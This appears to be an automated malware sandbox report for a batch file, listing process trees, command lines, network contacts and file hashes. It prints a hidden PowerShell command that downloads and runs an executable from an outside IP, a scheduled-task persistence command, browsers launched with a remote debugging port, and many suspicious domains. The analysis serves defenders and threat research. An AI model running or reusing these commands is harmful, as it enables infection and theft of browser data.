N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3772 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3772 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3064 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3064 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2180 wrote to memory of 4508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2180 wrote to memory of 4508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2004 wrote to memory of 3340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2004 wrote to memory of 3340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 224 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 224 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 4944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3064 wrote to memory of 1232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 1232 wrote to memory of 1084 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1084 wrote to memory of 4292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 4292 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4504 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 3900 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 4504 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
PID 3604 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 4432 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat" any_word

C:\Windows\system32\timeout.exe

timeout /t 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "ZDWezmacBOG" /tr "mshta \"C:\Temp\DWmIMSN8O.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\system32\mshta.exe

mshta "C:\Temp\DWmIMSN8O.hta"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3900 -ip 3900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 800

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe

"C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff952f5cc40,0x7ff952f5cc4c,0x7ff952f5cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1972,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1968 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1956,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2008 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2272,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2496 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3264 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4176,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4536 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3644 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4768,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4780 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4844,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4832 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe

"C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4980,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4992 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5136,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5024 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4996,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5008 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5012,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5068 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5092,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5088 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5240,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5184 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe

"C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff952f646f8,0x7ff952f64708,0x7ff952f64718

C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe

"C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5240 -ip 5240

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 go.advisewise.me udp
DE 116.203.10.65:443 go.advisewise.me tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 2.23.210.82:80 e6.o.lencr.org tcp
US 8.8.8.8:53 embarkiffe.shop udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 www.google.com udp
NL 172.217.23.196:443 www.google.com tcp
NL 172.217.23.196:443 www.google.com udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
NL 216.58.214.10:443 ogads-pa.googleapis.com udp
NL 172.217.168.206:443 apis.google.com udp
NL 216.58.214.10:443 ogads-pa.googleapis.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.39.110:443 play.google.com udp
NL 142.251.39.110:443 play.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 clients2.google.com udp
NL 142.251.36.46:443 clients2.google.com udp
NL 142.251.36.46:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
NL 142.250.179.129:443 clients2.googleusercontent.com udp
US 8.8.8.8:53 calmingtefxtures.run udp
US 172.67.158.171:443 calmingtefxtures.run tcp
US 8.8.8.8:53 foresctwhispers.top udp
US 104.21.48.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 tracnquilforest.life udp
US 172.67.164.79:443 tracnquilforest.life tcp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 boltetuurked.digital udp
N/A 127.0.0.1:9223 tcp
US 104.21.96.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp

Files

memory/4508-0-0x00007FF9526A3000-0x00007FF9526A5000-memory.dmp

memory/4508-1-0x0000020E21E70000-0x0000020E21E92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wpfztjut.3gs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4508-11-0x00007FF9526A0000-0x00007FF953161000-memory.dmp

memory/4508-12-0x00007FF9526A0000-0x00007FF953161000-memory.dmp

memory/4508-15-0x00007FF9526A0000-0x00007FF953161000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 acbae3a20017316bcc01b2f407be68e7
SHA1 3ae35ab773fcbcd982ffcc909ad4e8aa1a3a29fb
SHA256 fb4454cf124dcf8edf65a40b0bec05b653a57b5166cfd4aedb2ff1d49b12ca3d
SHA512 b62f4419ab16fdb0a5fc22bc0eb6fa0745c9135d4b450c595e948da793e8cbf0f3defacf59c733d56309d412eaf2fc020c452efe40c9a1f632f28f241101f5dc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e5bfec1063a497048fffb231a0621403
SHA1 97cf6a89f237f43b9c22e3e081f7d45924d435ba
SHA256 325d1ffa65e9593a834f3662168d0c1950de148c63f1e43b86727087f3881d6f
SHA512 e38c5189054cf09fb15de017d0bbe226338124ee02bb04530943c8fcfc303dbe5fe5fd28c9c1aea1b552d1a2b0b76cabbedd284a38a07d41ec9cf9e55b44dd0e

C:\Temp\DWmIMSN8O.hta

MD5 16d76e35baeb05bc069a12dce9da83f9
SHA1 f419fd74265369666595c7ce7823ef75b40b2768
SHA256 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA512 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1f0f8c49b22409ca78499f5df1ce9456
SHA1 5300f7ed636959c8c8366418e891dbe49a3edba9
SHA256 429128efcec165baf50a81021e610933e1020f5298d865f7b30daf370fb22014
SHA512 ca976a7ab0ef4782c3003433e8d99d34d8060cb3a8790e787b56db1e207902b9dd15ecb6e76fecbd00f5e83a8add34329b25f86b90c62055f0d0d1de5607d2af

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

MD5 a92d6465d69430b38cbc16bf1c6a7210
SHA1 421fadebee484c9d19b9cb18faf3b0f5d9b7a554
SHA256 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77
SHA512 0fc65c930a01db8cf306252402c47cf00b1222cd9d9736baf839488cdd6cf96ae8be479e08282ec7f34b665250580466a25cdfc699f4ecef6d5e4d543db8c345

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

MD5 4871c39a4a7c16a4547820b8c749a32c
SHA1 09728bba8d55355e9434305941e14403a8e1ca63
SHA256 8aa3e2705e32e8175242fcf19391ab909037111f19cf5f9953885c911f440453
SHA512 32fa81a1501b727cda79d25159e60ee5c627a8f4db6cbcc741b022d3d6e45c43eeb4fbcd8c8043f71bc23a4a326f66553314384c39c97aaf58b6385d9aac26ec

memory/3900-89-0x00000000001B0000-0x00000000001DC000-memory.dmp

memory/3900-90-0x0000000005050000-0x00000000055F4000-memory.dmp

memory/3604-92-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-94-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-101-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-103-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-108-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-109-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-112-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe

MD5 21cbf1c19605fa8a2dc9cd40990139ca
SHA1 a2c2c891b7f156bbf46428889cec083a4ae1b94c
SHA256 2bed46c8233ce24e911ae5264ffd59ec0932e711c2e5ba8d4171d34684d156ac
SHA512 43fe77ca93a34fdab17e508933c5476b149103320cce0abd44ea5bbe7ab91eec9990c3fce591f0ccd677b375ca74225e45d27638e5459e949cd18d78a61e3e00

memory/1232-127-0x00000000008E0000-0x0000000000BE9000-memory.dmp

memory/3604-131-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-132-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-136-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-137-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-141-0x0000000000400000-0x0000000000429000-memory.dmp

\??\pipe\crashpad_864_AQGFMUPYXXQOLAOY

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/1232-172-0x00000000008E0000-0x0000000000BE9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe

MD5 2f78a06ed676b813f5e094010267b7aa
SHA1 9a418672d952366730a9f3e83b5edb99fc9e80c7
SHA256 b3b2da11dbc333ed093b8507bb6f2d513782505588a26cc9a3d6f9e5bb74f5f8
SHA512 2a32f04f7c8a034b539659fde4faabdef7fd2e6032785585c40f9f95253c220c86b58388a1cc79d2ad7622157d26dd23c198a62311bec3fa0227119b913c354a

memory/1808-188-0x0000000000B60000-0x000000000100A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scoped_dir864_1950574921\b41fabab-80a8-4013-b09a-ac0ae292b8fc.tmp

MD5 eae462c55eba847a1a8b58e58976b253
SHA1 4d7c9d59d6ae64eb852bd60b48c161125c820673
SHA256 ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad
SHA512 494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

C:\Users\Admin\AppData\Local\Temp\scoped_dir864_1950574921\CRX_INSTALL\_locales\en_CA\messages.json

MD5 558659936250e03cc14b60ebf648aa09
SHA1 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
